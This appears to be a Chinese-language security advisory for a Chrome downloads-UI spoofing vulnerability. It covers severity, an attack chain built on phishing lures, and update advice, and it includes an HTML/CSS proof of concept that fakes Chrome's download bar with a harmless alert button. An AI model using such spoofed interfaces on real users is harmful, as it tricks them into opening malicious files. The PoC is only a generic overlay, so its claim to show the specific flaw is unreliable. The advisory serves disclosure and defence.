CVE-2026-5897 Google Chrome下载UI欺骗漏洞

漏洞信息

漏洞编号

CVE-2026-5897

漏洞类型

UI欺骗

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Google Chrome

漏洞概述

Google Chrome 147.0.7727.55 之前的版本中存在安全漏洞。该漏洞源于下载功能中的安全UI设计不正确。远程攻击者可以利用此漏洞，通过精心设计的HTML页面诱导用户执行特定的UI手势操作，从而实施UI欺骗攻击。尽管Chromium安全团队将其严重性评为低，但该问题可能影响用户对下载文件安全性的判断，导致用户误以为下载的文件是安全的，实际上可能存在风险。成功利用该漏洞需要用户交互。

技术细节

该漏洞属于浏览器UI逻辑缺陷，主要涉及Google Chrome下载栏的安全显示机制。在受影响版本中，浏览器未能准确渲染或隔离下载状态的安全UI，导致攻击者可以通过HTML/CSS覆盖或伪造界面元素。攻击者构造恶意网页，诱使用户在特定区域进行点击或手势操作。由于UI显示的不一致性，用户可能无法区分真实的浏览器提示和伪造的HTML元素。这种欺骗行为利用了用户对浏览器原生界面的信任，可能导致用户执行危险操作，如保留恶意文件或允许受限权限。利用条件较低，无需系统权限，但必须依赖用户的社会工程学交互。

攻击链分析

STEP 1

步骤1：准备恶意页面

攻击者构建包含伪造下载UI元素的HTML页面，并编写脚本监听用户交互。

STEP 2

步骤2：诱导访问

攻击者通过钓鱼邮件或社会工程学手段，诱导受害者访问该恶意网页。

STEP 3

步骤3：实施UI欺骗

受害者访问页面后，攻击者利用漏洞诱导受害者进行特定的UI手势操作（如点击伪造的下载栏）。

STEP 4

步骤4：达成攻击目标

受害者误以为操作的是浏览器原生的安全下载界面，实际上可能执行了攻击者预设的恶意代码或下载了恶意文件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
  PoC for CVE-2026-5897: Chrome Downloads UI Spoofing
  This PoC demonstrates how a crafted HTML page can mimic the download UI.
  Test environment: Google Chrome < 147.0.7727.55
-->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CVE-2026-5897 PoC</title>
    <style>
        body {
            font-family: sans-serif;
            margin: 0;
            padding: 20px;
        }
        /* Container to position the fake UI */
        .spoof-container {
            position: fixed;
            bottom: 0;
            left: 0;
            width: 100%;
            background-color: #f1f3f4;
            border-top: 1px solid #dadce0;
            padding: 12px 24px;
            box-shadow: 0 -2px 10px rgba(0,0,0,0.1);
            display: flex;
            align-items: center;
            justify-content: space-between;
            z-index: 9999;
        }
        .file-info {
            display: flex;
            align-items: center;
            gap: 12px;
        }
        .icon {
            width: 24px;
            height: 24px;
            background-color: #5f6368;
            border-radius: 4px;
        }
        .text {
            font-size: 14px;
            color: #202124;
        }
        .actions button {
            background: #1a73e8;
            color: white;
            border: none;
            padding: 6px 16px;
            border-radius: 4px;
            cursor: pointer;
            font-size: 14px;
        }
    </style>
</head>
<body>
    <h1>UI Spoofing Demonstration</h1>
    <p>Please observe the bottom of the screen. The UI below is rendered via HTML/CSS, not the actual browser download bar.</p>

    <!-- The Spoofed Download Bar -->
    <div class="spoof-container">
        <div class="file-info">
            <div class="icon"></div>
            <div class="text">Malicious_File.exe - Finished downloading</div>
        </div>
        <div class="actions">
            <button onclick="alert('User clicked spoofed button. Attack logic executed.')">Open File</button>
        </div>
    </div>

    <script>
        // Wait for user gesture as required by the vulnerability description
        document.addEventListener('click', () => {
            console.log('User interaction detected. Spoofing context active.');
        });
    </script>
</body>
</html>

影响范围

Google Chrome < 147.0.7727.55

防御指南

临时缓解措施

建议用户立即检查并更新Google Chrome浏览器到最新版本以修补此漏洞。在未完成更新前，用户应保持警惕，不要轻易相信浏览器界面中出现的下载提示，特别是当来源不明的网页要求进行特定手势交互时。可以通过检查任务管理器或直接访问官方下载页面来确认文件的真实性。